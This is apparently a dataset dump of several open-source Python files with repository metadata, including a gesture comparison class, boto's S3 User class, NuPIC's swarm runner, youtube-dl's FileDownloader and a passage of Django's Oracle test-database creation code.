score = self.dot_product(comparison_gesture)
if score <= 0:
return score
score /= math.sqrt(
self.gesture_product * comparison_gesture.gesture_product)
return score
def __eq__(self, comparison_gesture):
''' Allows easy comparisons between gesture instances.'''
if isinstance(comparison_gesture, Gesture):
            # If the gestures don't have the same number of strokes, it's
# definitely not the same gesture
score = self.get_score(comparison_gesture)
if (score > (1.0 - self.tolerance) and
score < (1.0 + self.tolerance)):
return True
else:
return False
else:
return NotImplemented
def __ne__(self, comparison_gesture):
result = self.__eq__(comparison_gesture)
if result is NotImplemented:
return result
else:
return not result
def __lt__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with <")
def __gt__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with >")
def __le__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with <=")
def __ge__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with >=")
| mit | 5,757,994,173,714,974,000 | 33.509434 | 79 | 0.567387 | false |
chenc10/Spark-PAF | ec2/lib/boto-2.34.0/boto/s3/user.py | 171 | 1968 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class User(object):
def __init__(self, parent=None, id='', display_name=''):
if parent:
parent.owner = self
self.type = None
self.id = id
self.display_name = display_name
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'DisplayName':
self.display_name = value
elif name == 'ID':
self.id = value
else:
setattr(self, name, value)
def to_xml(self, element_name='Owner'):
if self.type:
s = '<%s xsi:type="%s">' % (element_name, self.type)
else:
s = '<%s>' % element_name
s += '<ID>%s</ID>' % self.id
s += '<DisplayName>%s</DisplayName>' % self.display_name
s += '</%s>' % element_name
return s
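# Hedged illustration (added comment, not in the original module): for
# User(id='1234abcd', display_name='alice'), to_xml() produces
#   <Owner><ID>1234abcd</ID><DisplayName>alice</DisplayName></Owner>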
| apache-2.0 | 4,328,289,422,621,144,600 | 39.163265 | 74 | 0.655488 | false |
pulinagrawal/nupic | scripts/run_swarm.py | 9 | 7871 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
""" @file run_swarm.py
This script is the command-line interface for running swarms in nupic."""
import sys
import os
import optparse
from nupic.swarming import permutations_runner
from nupic.swarming.permutations_runner import DEFAULT_OPTIONS
def runPermutations(args):
"""
The main function of the RunPermutations utility.
This utility will automatically generate and run multiple prediction framework
experiments that are permutations of a base experiment via the Grok engine.
For example, if you have an experiment that you want to test with 3 possible
values of variable A and 2 possible values of variable B, this utility will
automatically generate the experiment directories and description files for
each of the 6 different experiments.
Here is an example permutations file which is read by this script below. The
permutations file must be in the same directory as the description.py for the
base experiment that you want to permute. It contains a permutations dict, an
optional list of the result items to report on for each experiment, and an
optional result item to optimize for.
When an 'optimize' entry is provided, this tool will attempt to prioritize the
order in which the various permutations are run in order to improve the odds
of running the best permutations sooner. It does this by watching the results
for various parameter values and putting parameter values that give generally
better results at the head of the queue.
In addition, when the optimize key is provided, we periodically update the UI
with the best results obtained so far on that metric.
---------------------------------------------------------------------------
permutations = dict(
iterationCount = [1000, 5000],
coincCount = [50, 100],
trainTP = [False],
)
report = ['.*reconstructErrAvg',
'.*inputPredScore.*',
]
optimize = 'postProc_gym1_baseline:inputPredScore'
Parameters:
----------------------------------------------------------------------
args: Command-line args; the equivalent of sys.argv[1:]
retval: for the actions 'run', 'pickup', and 'dryRun', returns the
                  Hypersearch job ID (in ClientJobs table); otherwise returns
None
"""
helpString = (
"\n\n%prog [options] permutationsScript\n"
"%prog [options] expDescription.json\n\n"
"This script runs permutations of an experiment via Grok engine, as "
"defined in a\npermutations.py script or an expGenerator experiment "
"description json file.\nIn the expDescription.json form, the json file "
"MUST have the file extension\n'.json' and MUST conform to "
"expGenerator/experimentDescriptionSchema.json.")
parser = optparse.OptionParser(usage=helpString)
parser.add_option(
"--replaceReport", dest="replaceReport", action="store_true",
default=DEFAULT_OPTIONS["replaceReport"],
help="Replace existing csv report file if it exists. Default is to "
"append to the existing file. [default: %default].")
parser.add_option(
"--action", dest="action", default=DEFAULT_OPTIONS["action"],
choices=["run", "pickup", "report", "dryRun"],
help="Which action to perform. Possible actions are run, pickup, choices, "
"report, list. "
"run: run a new HyperSearch via Grok. "
"pickup: pick up the latest run of a HyperSearch job. "
"dryRun: run a single HypersearchWorker inline within the application "
"process without the Grok infrastructure to flush out bugs in "
"description and permutations scripts; defaults to "
"maxPermutations=1: use --maxPermutations to change this; "
"report: just print results from the last or current run. "
"[default: %default].")
parser.add_option(
"--maxPermutations", dest="maxPermutations",
default=DEFAULT_OPTIONS["maxPermutations"], type="int",
help="Maximum number of models to search. Applies only to the 'run' and "
"'dryRun' actions. [default: %default].")
parser.add_option(
"--exports", dest="exports", default=DEFAULT_OPTIONS["exports"],
type="string",
help="json dump of environment variable settings that should be applied"
"for the job before running. [default: %default].")
parser.add_option(
"--useTerminators", dest="useTerminators", action="store_true",
default=DEFAULT_OPTIONS["useTerminators"], help="Use early model terminators in HyperSearch"
"[default: %default].")
parser.add_option(
"--maxWorkers", dest="maxWorkers", default=DEFAULT_OPTIONS["maxWorkers"],
type="int",
help="Maximum number of concurrent workers to launch. Applies only to "
"the 'run' action. [default: %default].")
parser.add_option(
"-v", dest="verbosityCount", action="count", default=0,
help="Increase verbosity of the output. Specify multiple times for "
"increased verbosity. e.g., -vv is more verbose than -v.")
parser.add_option(
"--timeout", dest="timeout", default=DEFAULT_OPTIONS["timeout"], type="int",
help="Time out for this search in minutes"
"[default: %default].")
parser.add_option(
"--overwrite", default=DEFAULT_OPTIONS["overwrite"], action="store_true",
help="If 'yes', overwrite existing description.py and permutations.py"
" (in the same directory as the <expDescription.json> file) if they"
" already exist. [default: %default].")
parser.add_option(
"--genTopNDescriptions", dest="genTopNDescriptions",
default=DEFAULT_OPTIONS["genTopNDescriptions"], type="int",
help="Generate description files for the top N models. Each one will be"
" placed into it's own subdirectory under the base description file."
"[default: %default].")
(options, positionalArgs) = parser.parse_args(args)
# Get the permutations script's filepath
if len(positionalArgs) != 1:
parser.error("You must supply the name of exactly one permutations script "
"or JSON description file.")
fileArgPath = os.path.expanduser(positionalArgs[0])
fileArgPath = os.path.expandvars(fileArgPath)
fileArgPath = os.path.abspath(fileArgPath)
permWorkDir = os.path.dirname(fileArgPath)
outputLabel = os.path.splitext(os.path.basename(fileArgPath))[0]
basename = os.path.basename(fileArgPath)
fileExtension = os.path.splitext(basename)[1]
optionsDict = vars(options)
if fileExtension == ".json":
returnValue = permutations_runner.runWithJsonFile(
fileArgPath, optionsDict, outputLabel, permWorkDir)
else:
returnValue = permutations_runner.runWithPermutationsScript(
fileArgPath, optionsDict, outputLabel, permWorkDir)
return returnValue
if __name__ == "__main__":
runPermutations(sys.argv[1:])
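# --- Illustrative usage (an assumption, not part of the original script):
# --- typical shell invocations of run_swarm.py, using only options defined
# --- above. The file names shown are hypothetical.
#
#   python run_swarm.py permutations.py --maxWorkers=4
#   python run_swarm.py exp_description.json --overwrite
#   python run_swarm.py permutations.py --action=dryRun --maxPermutations=1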
| agpl-3.0 | 2,867,927,407,687,574,000 | 41.317204 | 96 | 0.677423 | false |
alqfahad/odoo | addons/auth_openid/utils.py | 428 | 1589 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
KEY_LENGTH = 16
SREG2AX = { # from http://www.axschema.org/types/#sreg
'nickname': 'http://axschema.org/namePerson/friendly',
'email': 'http://axschema.org/contact/email',
'fullname': 'http://axschema.org/namePerson',
'dob': 'http://axschema.org/birthDate',
'gender': 'http://axschema.org/person/gender',
'postcode': 'http://axschema.org/contact/postalCode/home',
'country': 'http://axschema.org/contact/country/home',
'language': 'http://axschema.org/pref/language',
'timezone': 'http://axschema.org/pref/timezone',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,679,406,192,559,422,000 | 44.4 | 78 | 0.631215 | false |
TwinkleChawla/nova | nova/db/sqlalchemy/migrate_repo/versions/300_migration_context.py | 44 | 1117 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Column
from sqlalchemy import MetaData
from sqlalchemy import Table
from sqlalchemy import Text
BASE_TABLE_NAME = 'instance_extra'
NEW_COLUMN_NAME = 'migration_context'
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
for prefix in ('', 'shadow_'):
table = Table(prefix + BASE_TABLE_NAME, meta, autoload=True)
new_column = Column(NEW_COLUMN_NAME, Text, nullable=True)
if not hasattr(table.c, NEW_COLUMN_NAME):
table.create_column(new_column)
| apache-2.0 | 2,894,455,576,971,951,000 | 33.90625 | 78 | 0.709937 | false |
msingh172/youtube-dl | youtube_dl/downloader/common.py | 95 | 13848 | from __future__ import division, unicode_literals
import os
import re
import sys
import time
from ..compat import compat_str
from ..utils import (
encodeFilename,
decodeArgument,
format_bytes,
timeconvert,
)
class FileDownloader(object):
"""File Downloader class.
File downloader objects are the ones responsible of downloading the
actual video file and writing it to disk.
File downloaders accept a lot of parameters. In order not to saturate
the object constructor with arguments, it receives a dictionary of
options instead.
Available options:
verbose: Print additional info to stdout.
quiet: Do not print messages to stdout.
ratelimit: Download speed limit, in bytes/sec.
retries: Number of times to retry for HTTP error 5xx
buffersize: Size of download buffer in bytes.
noresizebuffer: Do not automatically resize the download buffer.
continuedl: Try to continue downloads if possible.
noprogress: Do not print the progress bar.
logtostderr: Log messages to stderr instead of stdout.
consoletitle: Display progress in console window's titlebar.
nopart: Do not use temporary .part files.
updatetime: Use the Last-modified header to set output file timestamps.
test: Download only first bytes to test the downloader.
min_filesize: Skip files smaller than this size
max_filesize: Skip files larger than this size
xattr_set_filesize: Set ytdl.filesize user xattribute with expected size.
                        (experimental)
external_downloader_args: A list of additional command-line arguments for the
external downloader.
Subclasses of this one must re-define the real_download method.
"""
_TEST_FILE_SIZE = 10241
params = None
def __init__(self, ydl, params):
"""Create a FileDownloader object with the given options."""
self.ydl = ydl
self._progress_hooks = []
self.params = params
self.add_progress_hook(self.report_progress)
@staticmethod
def format_seconds(seconds):
(mins, secs) = divmod(seconds, 60)
(hours, mins) = divmod(mins, 60)
if hours > 99:
return '--:--:--'
if hours == 0:
return '%02d:%02d' % (mins, secs)
else:
return '%02d:%02d:%02d' % (hours, mins, secs)
@staticmethod
def calc_percent(byte_counter, data_len):
if data_len is None:
return None
return float(byte_counter) / float(data_len) * 100.0
@staticmethod
def format_percent(percent):
if percent is None:
return '---.-%'
return '%6s' % ('%3.1f%%' % percent)
@staticmethod
def calc_eta(start, now, total, current):
if total is None:
return None
if now is None:
now = time.time()
dif = now - start
if current == 0 or dif < 0.001: # One millisecond
return None
rate = float(current) / dif
return int((float(total) - float(current)) / rate)
@staticmethod
def format_eta(eta):
if eta is None:
return '--:--'
return FileDownloader.format_seconds(eta)
@staticmethod
def calc_speed(start, now, bytes):
dif = now - start
if bytes == 0 or dif < 0.001: # One millisecond
return None
return float(bytes) / dif
@staticmethod
def format_speed(speed):
if speed is None:
return '%10s' % '---b/s'
return '%10s' % ('%s/s' % format_bytes(speed))
@staticmethod
def best_block_size(elapsed_time, bytes):
new_min = max(bytes / 2.0, 1.0)
new_max = min(max(bytes * 2.0, 1.0), 4194304) # Do not surpass 4 MB
if elapsed_time < 0.001:
return int(new_max)
rate = bytes / elapsed_time
if rate > new_max:
return int(new_max)
if rate < new_min:
return int(new_min)
return int(rate)
@staticmethod
def parse_bytes(bytestr):
"""Parse a string indicating a byte quantity into an integer."""
matchobj = re.match(r'(?i)^(\d+(?:\.\d+)?)([kMGTPEZY]?)$', bytestr)
if matchobj is None:
return None
number = float(matchobj.group(1))
multiplier = 1024.0 ** 'bkmgtpezy'.index(matchobj.group(2).lower())
return int(round(number * multiplier))
def to_screen(self, *args, **kargs):
self.ydl.to_screen(*args, **kargs)
def to_stderr(self, message):
self.ydl.to_screen(message)
def to_console_title(self, message):
self.ydl.to_console_title(message)
def trouble(self, *args, **kargs):
self.ydl.trouble(*args, **kargs)
def report_warning(self, *args, **kargs):
self.ydl.report_warning(*args, **kargs)
def report_error(self, *args, **kargs):
self.ydl.report_error(*args, **kargs)
def slow_down(self, start_time, now, byte_counter):
"""Sleep if the download speed is over the rate limit."""
rate_limit = self.params.get('ratelimit', None)
if rate_limit is None or byte_counter == 0:
return
if now is None:
now = time.time()
elapsed = now - start_time
if elapsed <= 0.0:
return
speed = float(byte_counter) / elapsed
if speed > rate_limit:
time.sleep(max((byte_counter // rate_limit) - elapsed, 0))
def temp_name(self, filename):
"""Returns a temporary filename for the given filename."""
if self.params.get('nopart', False) or filename == '-' or \
(os.path.exists(encodeFilename(filename)) and not os.path.isfile(encodeFilename(filename))):
return filename
return filename + '.part'
def undo_temp_name(self, filename):
if filename.endswith('.part'):
return filename[:-len('.part')]
return filename
def try_rename(self, old_filename, new_filename):
try:
if old_filename == new_filename:
return
os.rename(encodeFilename(old_filename), encodeFilename(new_filename))
except (IOError, OSError) as err:
self.report_error('unable to rename file: %s' % compat_str(err))
def try_utime(self, filename, last_modified_hdr):
"""Try to set the last-modified time of the given file."""
if last_modified_hdr is None:
return
if not os.path.isfile(encodeFilename(filename)):
return
timestr = last_modified_hdr
if timestr is None:
return
filetime = timeconvert(timestr)
if filetime is None:
return filetime
# Ignore obviously invalid dates
if filetime == 0:
return
try:
os.utime(filename, (time.time(), filetime))
except Exception:
pass
return filetime
def report_destination(self, filename):
"""Report destination filename."""
self.to_screen('[download] Destination: ' + filename)
def _report_progress_status(self, msg, is_last_line=False):
fullmsg = '[download] ' + msg
if self.params.get('progress_with_newline', False):
self.to_screen(fullmsg)
else:
if os.name == 'nt':
prev_len = getattr(self, '_report_progress_prev_line_length',
0)
if prev_len > len(fullmsg):
fullmsg += ' ' * (prev_len - len(fullmsg))
self._report_progress_prev_line_length = len(fullmsg)
clear_line = '\r'
else:
clear_line = ('\r\x1b[K' if sys.stderr.isatty() else '\r')
self.to_screen(clear_line + fullmsg, skip_eol=not is_last_line)
self.to_console_title('youtube-dl ' + msg)
def report_progress(self, s):
if s['status'] == 'finished':
if self.params.get('noprogress', False):
self.to_screen('[download] Download completed')
else:
s['_total_bytes_str'] = format_bytes(s['total_bytes'])
if s.get('elapsed') is not None:
s['_elapsed_str'] = self.format_seconds(s['elapsed'])
msg_template = '100%% of %(_total_bytes_str)s in %(_elapsed_str)s'
else:
msg_template = '100%% of %(_total_bytes_str)s'
self._report_progress_status(
msg_template % s, is_last_line=True)
if self.params.get('noprogress'):
return
if s['status'] != 'downloading':
return
if s.get('eta') is not None:
s['_eta_str'] = self.format_eta(s['eta'])
else:
s['_eta_str'] = 'Unknown ETA'
if s.get('total_bytes') and s.get('downloaded_bytes') is not None:
s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes'])
elif s.get('total_bytes_estimate') and s.get('downloaded_bytes') is not None:
s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes_estimate'])
else:
if s.get('downloaded_bytes') == 0:
s['_percent_str'] = self.format_percent(0)
else:
s['_percent_str'] = 'Unknown %'
if s.get('speed') is not None:
s['_speed_str'] = self.format_speed(s['speed'])
else:
s['_speed_str'] = 'Unknown speed'
if s.get('total_bytes') is not None:
s['_total_bytes_str'] = format_bytes(s['total_bytes'])
msg_template = '%(_percent_str)s of %(_total_bytes_str)s at %(_speed_str)s ETA %(_eta_str)s'
elif s.get('total_bytes_estimate') is not None:
s['_total_bytes_estimate_str'] = format_bytes(s['total_bytes_estimate'])
msg_template = '%(_percent_str)s of ~%(_total_bytes_estimate_str)s at %(_speed_str)s ETA %(_eta_str)s'
else:
if s.get('downloaded_bytes') is not None:
s['_downloaded_bytes_str'] = format_bytes(s['downloaded_bytes'])
if s.get('elapsed'):
s['_elapsed_str'] = self.format_seconds(s['elapsed'])
msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s (%(_elapsed_str)s)'
else:
msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s'
else:
                msg_template = '%(_percent_str)s at %(_speed_str)s ETA %(_eta_str)s'
self._report_progress_status(msg_template % s)
def report_resuming_byte(self, resume_len):
"""Report attempt to resume at given byte."""
self.to_screen('[download] Resuming download at byte %s' % resume_len)
def report_retry(self, count, retries):
"""Report retry in case of HTTP error 5xx"""
self.to_screen('[download] Got server HTTP error. Retrying (attempt %d of %d)...' % (count, retries))
def report_file_already_downloaded(self, file_name):
"""Report file has already been fully downloaded."""
try:
self.to_screen('[download] %s has already been downloaded' % file_name)
except UnicodeEncodeError:
self.to_screen('[download] The file has already been downloaded')
def report_unable_to_resume(self):
"""Report it was impossible to resume download."""
self.to_screen('[download] Unable to resume')
def download(self, filename, info_dict):
"""Download to a filename using the info from info_dict
Return True on success and False otherwise
"""
nooverwrites_and_exists = (
self.params.get('nooverwrites', False) and
os.path.exists(encodeFilename(filename))
)
continuedl_and_exists = (
self.params.get('continuedl', True) and
os.path.isfile(encodeFilename(filename)) and
not self.params.get('nopart', False)
)
# Check file already present
if filename != '-' and nooverwrites_and_exists or continuedl_and_exists:
self.report_file_already_downloaded(filename)
self._hook_progress({
'filename': filename,
'status': 'finished',
'total_bytes': os.path.getsize(encodeFilename(filename)),
})
return True
sleep_interval = self.params.get('sleep_interval')
if sleep_interval:
self.to_screen('[download] Sleeping %s seconds...' % sleep_interval)
time.sleep(sleep_interval)
return self.real_download(filename, info_dict)
def real_download(self, filename, info_dict):
"""Real download process. Redefine in subclasses."""
raise NotImplementedError('This method must be implemented by subclasses')
def _hook_progress(self, status):
for ph in self._progress_hooks:
ph(status)
def add_progress_hook(self, ph):
# See YoutubeDl.py (search for progress_hooks) for a description of
# this interface
self._progress_hooks.append(ph)
def _debug_cmd(self, args, exe=None):
if not self.params.get('verbose', False):
return
str_args = [decodeArgument(a) for a in args]
if exe is None:
exe = os.path.basename(str_args[0])
try:
import pipes
shell_quote = lambda args: ' '.join(map(pipes.quote, str_args))
except ImportError:
shell_quote = repr
self.to_screen('[debug] %s command line: %s' % (
exe, shell_quote(str_args)))
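# --- Illustrative sketch (an assumption, not part of youtube-dl): a minimal
# --- FileDownloader subclass showing the contract described in the class
# --- docstring above -- subclasses override real_download() and report
# --- progress through _hook_progress(). The class below is hypothetical.
class _NoopDownloader(FileDownloader):
    """Toy downloader that downloads nothing, to illustrate the required API."""
    def real_download(self, filename, info_dict):
        self.report_destination(filename)
        # A real implementation would fetch data here, periodically calling
        # self._hook_progress({'status': 'downloading', ...}) so that the
        # registered progress hooks (e.g. report_progress) are updated.
        self._hook_progress({
            'filename': filename,
            'status': 'finished',
            'total_bytes': 0,
        })
        return True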
| unlicense | -4,916,545,909,078,302,000 | 36.225806 | 114 | 0.570624 | false |
armink/rt-thread | bsp/k210/rtconfig.py | 6 | 1560 | import os
# toolchains options
ARCH ='risc-v'
CPU ='k210'
CROSS_TOOL ='gcc'
if os.getenv('RTT_ROOT'):
RTT_ROOT = os.getenv('RTT_ROOT')
else:
RTT_ROOT = r'../..'
if os.getenv('RTT_CC'):
CROSS_TOOL = os.getenv('RTT_CC')
if CROSS_TOOL == 'gcc':
PLATFORM = 'gcc'
EXEC_PATH = r'/opt/gnu-mcu-eclipse/riscv-none-gcc/8.2.0-2.1-20190425-1021/bin'
else:
    print('Please make sure your toolchain is GNU GCC!')
exit(0)
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
BUILD = 'release'
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'riscv-none-embed-'
CC = PREFIX + 'gcc'
CXX = PREFIX + 'g++'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'elf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcmodel=medany -march=rv64imafc -mabi=lp64f -fsingle-precision-constant'
CFLAGS = DEVICE + ' -fno-common -ffunction-sections -fdata-sections -fstrict-volatile-bitfields'
AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp'
LFLAGS = DEVICE + ' -nostartfiles -Wl,--gc-sections,-Map=rtthread.map,-cref,-u,_start -T link.lds'
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -ggdb'
AFLAGS += ' -ggdb'
else:
CFLAGS += ' -O2 -Os'
CXXFLAGS = CFLAGS
DUMP_ACTION = OBJDUMP + ' -D -S $TARGET > rtt.asm\n'
POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n'
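# --- Illustrative usage (an assumption, not part of this BSP): environment
# --- variables read above, as they might be set before invoking the build.
#
#   export RTT_CC=gcc
#   export RTT_EXEC_PATH=/opt/gnu-mcu-eclipse/riscv-none-gcc/8.2.0-2.1-20190425-1021/bin
#   scons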
| apache-2.0 | 1,494,322,203,547,483,600 | 26.368421 | 103 | 0.571154 | false |
ChenJunor/hue | desktop/core/ext-py/Django-1.6.10/django/db/backends/oracle/creation.py | 104 | 12331 | import sys
import time
from django.conf import settings
from django.db.backends.creation import BaseDatabaseCreation
from django.utils.six.moves import input
TEST_DATABASE_PREFIX = 'test_'
PASSWORD = 'Im_a_lumberjack'
class DatabaseCreation(BaseDatabaseCreation):
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
# output (the "qn_" prefix is stripped before the lookup is performed.
data_types = {
'AutoField': 'NUMBER(11)',
'BinaryField': 'BLOB',
'BooleanField': 'NUMBER(1) CHECK (%(qn_column)s IN (0,1))',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'GenericIPAddressField': 'VARCHAR2(39)',
'NullBooleanField': 'NUMBER(1) CHECK ((%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL))',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'PositiveSmallIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
}
def __init__(self, connection):
super(DatabaseCreation, self).__init__(connection)
def _create_test_db(self, verbosity=1, autoclobber=False):
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
cursor = self.connection.cursor()
if self._test_database_create():
try:
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception as e:
sys.stderr.write("Got an error creating the test database: %s\n" % e)
if not autoclobber:
confirm = input("It appears the test database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_NAME)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print("Destroying old test database '%s'..." % self.connection.alias)
self._execute_test_db_destruction(cursor, parameters, verbosity)
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception as e:
sys.stderr.write("Got an error recreating the test database: %s\n" % e)
sys.exit(2)
else:
print("Tests cancelled.")
sys.exit(1)
if self._test_user_create():
if verbosity >= 1:
print("Creating test user...")
try:
self._create_test_user(cursor, parameters, verbosity)
except Exception as e:
sys.stderr.write("Got an error creating the test user: %s\n" % e)
if not autoclobber:
confirm = input("It appears the test user, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_USER)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print("Destroying old test user...")
self._destroy_test_user(cursor, parameters, verbosity)
if verbosity >= 1:
print("Creating test user...")
self._create_test_user(cursor, parameters, verbosity)
except Exception as e:
sys.stderr.write("Got an error recreating the test user: %s\n" % e)
sys.exit(2)
else:
print("Tests cancelled.")
sys.exit(1)
real_settings = settings.DATABASES[self.connection.alias]
real_settings['SAVED_USER'] = self.connection.settings_dict['SAVED_USER'] = self.connection.settings_dict['USER']
real_settings['SAVED_PASSWORD'] = self.connection.settings_dict['SAVED_PASSWORD'] = self.connection.settings_dict['PASSWORD']
real_settings['TEST_USER'] = real_settings['USER'] = self.connection.settings_dict['TEST_USER'] = self.connection.settings_dict['USER'] = TEST_USER
real_settings['PASSWORD'] = self.connection.settings_dict['PASSWORD'] = TEST_PASSWD
return self.connection.settings_dict['NAME']
def _destroy_test_db(self, test_database_name, verbosity=1):
"""
Destroy a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
"""
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
self.connection.settings_dict['USER'] = self.connection.settings_dict['SAVED_USER']
self.connection.settings_dict['PASSWORD'] = self.connection.settings_dict['SAVED_PASSWORD']
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
cursor = self.connection.cursor()
time.sleep(1) # To avoid "database is being accessed by other users" errors.
if self._test_user_create():
if verbosity >= 1:
print('Destroying test user...')
self._destroy_test_user(cursor, parameters, verbosity)
if self._test_database_create():
if verbosity >= 1:
print('Destroying test database tables...')
self._execute_test_db_destruction(cursor, parameters, verbosity)
self.connection.close()
def _execute_test_db_creation(self, cursor, parameters, verbosity):
if verbosity >= 2:
print("_create_test_db(): dbname = %s" % parameters['dbname'])
statements = [
"""CREATE TABLESPACE %(tblspace)s
DATAFILE '%(tblspace)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 200M
""",
"""CREATE TEMPORARY TABLESPACE %(tblspace_temp)s
TEMPFILE '%(tblspace_temp)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 100M
""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _create_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print("_create_test_user(): username = %s" % parameters['user'])
statements = [
"""CREATE USER %(user)s
IDENTIFIED BY %(password)s
DEFAULT TABLESPACE %(tblspace)s
TEMPORARY TABLESPACE %(tblspace_temp)s
QUOTA UNLIMITED ON %(tblspace)s
""",
"""GRANT CONNECT, RESOURCE TO %(user)s""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_test_db_destruction(self, cursor, parameters, verbosity):
if verbosity >= 2:
